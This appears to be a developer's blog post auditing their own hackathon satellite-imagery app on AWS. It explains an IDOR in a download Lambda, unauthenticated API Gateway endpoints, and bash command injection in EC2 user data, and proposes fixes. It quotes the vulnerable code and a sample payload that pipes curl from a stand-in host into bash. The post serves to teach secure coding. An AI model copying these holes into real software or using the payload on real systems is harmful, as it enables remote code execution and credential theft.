Back in February I helped build a thing called Sentinel Eye for the HyperSpace Innovation Hackathon.
The pitch was simple. You draw a box anywhere on a map, and the system goes and fetches Sentinel-2 satellite imagery for that exact patch of Earth, runs the math on it, and tells you where forest got cut down or where a city quietly ate a field. Draw a rectangle over the Amazon, wait a few minutes, get back real GeoTIFF files showing deforestation. It felt like magic. It got us to nationals. I was very proud of it.
Then the hackathon ended, the AWS credits dried up, and I tore the whole thing down before it could start charging me rent.
Fast forward a few months. I have been learning security properly, finished TCM's Practical Ethical Hacking course, and I now spend my evenings on PortSwigger labs like a normal well-adjusted person. And I had a cursed idea. What if I went back and read my own code from February, except this time I read it the way someone trying to break in would, instead of the way someone trying to survive a demo at 3am does?
It took about ten minutes to find the first hole. Then I found two more. Come look at the crime scene with me.
Act one: the download button that downloads anything
I started with the download endpoint, because "here is your file" routes are exactly where hackathon me cut the most corners. Here is the actual Lambda, trimmed a little:
def lambda_handler(event, context):
body = json.loads(event.get('body', '{}'))
job_id = body.get('job_id')
file_type = body.get('file_type')
s3_key = body.get('s3_key') # the client tells us which file it wants
download_url = s3_client.generate_presigned_url(
'get_object',
Params={'Bucket': BUCKET_NAME, 'Key': s3_key},
ExpiresIn=EXPIRATION
)
return {'statusCode': 200, 'body': json.dumps({'download_url': download_url})}
Look at the s3_key line. The client sends a key, and the server goes "sure, signed URL for whatever you asked for, coming right up." There is no check that the key belongs to your job. No check that it belongs to you at all. Want results/some-other-persons-job/deforestation.tif? Done. Want to start guessing your way around the rest of the bucket? Knock yourself out.
This is a textbook IDOR, an insecure direct object reference, and I implemented it with the calm confidence of a man who had never once considered that a stranger might call his API. In my head the only thing that would ever hit this endpoint was my own React app, politely handing back the exact key the server had just given it. But APIs do not run on the honor system. The client is not your friend. The client is a text box that anyone on the internet can type into.
The fix is boring, which is the point. Do not let the caller name the file. Take the job_id, confirm the request actually owns that job, and build the key on the server from values you control. The client should be able to say "give me the deforestation result for my job," not "give me arbitrary object number whatever."
Act two: the endpoint anyone could use to spend my money
Next I went looking for the auth. Reader, there was no auth.
Here is the relevant line from my own deploy script, where I create the API Gateway methods:
aws apigateway put-method \
--rest-api-id $API_ID \
--resource-id $ANALYZE_RESOURCE_ID \
--http-method POST \
--authorization-type NONE
authorization-type NONE. Both the analyze endpoint and the download endpoint were wide open to the entire internet. No API key, no token, nothing.
Now remember what the analyze endpoint actually does. It calls a paid satellite imagery API, then launches an EC2 instance to crunch the data. Every single request costs real money and spins up real compute. An open endpoint that launches servers is not a feature, it is a GoFundMe for whoever finds it. A bored person with a for loop could have turned my AWS bill into a phone number. The fun part is that EC2 instances launching in a loop is exactly the kind of thing you do not notice until the email arrives.
Lock the endpoints behind auth, put rate limiting in front of them, and validate the input so nobody can request a 10,000 square kilometer region "just to see." None of that occurred to me at the time because the app worked when I clicked the button, and when the app works, builder brain declares victory and goes to sleep.
Act three: the one that made me put my head on the desk
This is the launch function. When a job comes in, this code builds a startup script and hands it to a fresh EC2 instance to run at boot:
user_data_script = f"""#!/bin/bash
cd /home/ec2-user
aws s3 cp s3://{BUCKET_NAME}/scripts/ec2_dynamic_processor.py ./
python3 ec2_dynamic_processor.py '{job_id}' '{json.dumps(start_data)}' '{json.dumps(end_data)}' '{json.dumps(change_types)}'
sudo shutdown -h now
So the instance boots and runs this bash script. And the script pastes my variables straight into a command, wrapped in single quotes. One of those variables is change_types, and change_types comes directly from the request body. Which, as we established in act two, is whatever a complete stranger felt like sending.
Single quotes in bash protect you right up until someone types a single quote.
If change_types is ["deforestation"], everything is fine and the world keeps turning. If change_types is ["'; curl evil.sh | bash #"], that little quote character closes my string early, and everything after it runs as a shell command. On my EC2 box. With the instance's IAM role attached, ready to be borrowed.
That is not a bug. That is remote code execution with a side of free credentials. I set out to build a tool that detects deforestation and I accidentally shipped a tool that detects whether you would like a shell on my server.
The fix here is to stop building shell commands out of strings entirely. Pass the data through a file or an environment variable, or honestly just do the work in the Lambda and skip the "interpolate user input into bash at boot" genre of decision altogether.
In fairness to past me, who is currently being dragged
A few things were not actually terrible, and I want credit for them because the rest of this post is rough:
- The SentinelHub API keys lived in AWS Secrets Manager, not hardcoded in the repo. The bar is on the floor, but I cleared it.
- The permission to read that secret was scoped to that one secret, not "every secret in the account, please."
- Downloads went through expiring presigned URLs instead of a public bucket.
- The EC2 boxes shut themselves down after each job, so even the injection had a smallish window to play in.
So the instincts were not all bad. The actual problem was simpler than any single bug. I spent the entire hackathon thinking like a builder. Builder brain asks one question: does the happy path work? It clicks the button, sees the right output, and goes home happy. Attacker brain asks a different question: what happens when I do the obviously cursed thing you clearly did not plan for? Those are two different muscles, and back then I had only ever trained one of them.
Reading your own old code with the other muscle is genuinely one of the best ways I have found to learn this stuff. There is no tutorial, no contrived "spot the vuln" lab, just past you leaving the door open and present you walking through it going "oh no. oh no, I did this."
The code is on my GitHub if you want to point and laugh, or quietly check whether you have written the same three bugs (you probably have, we all have, it is fine).
Anyway. Go reread something you built a few months ago. Bring snacks. You are going to find something.
Top comments (0)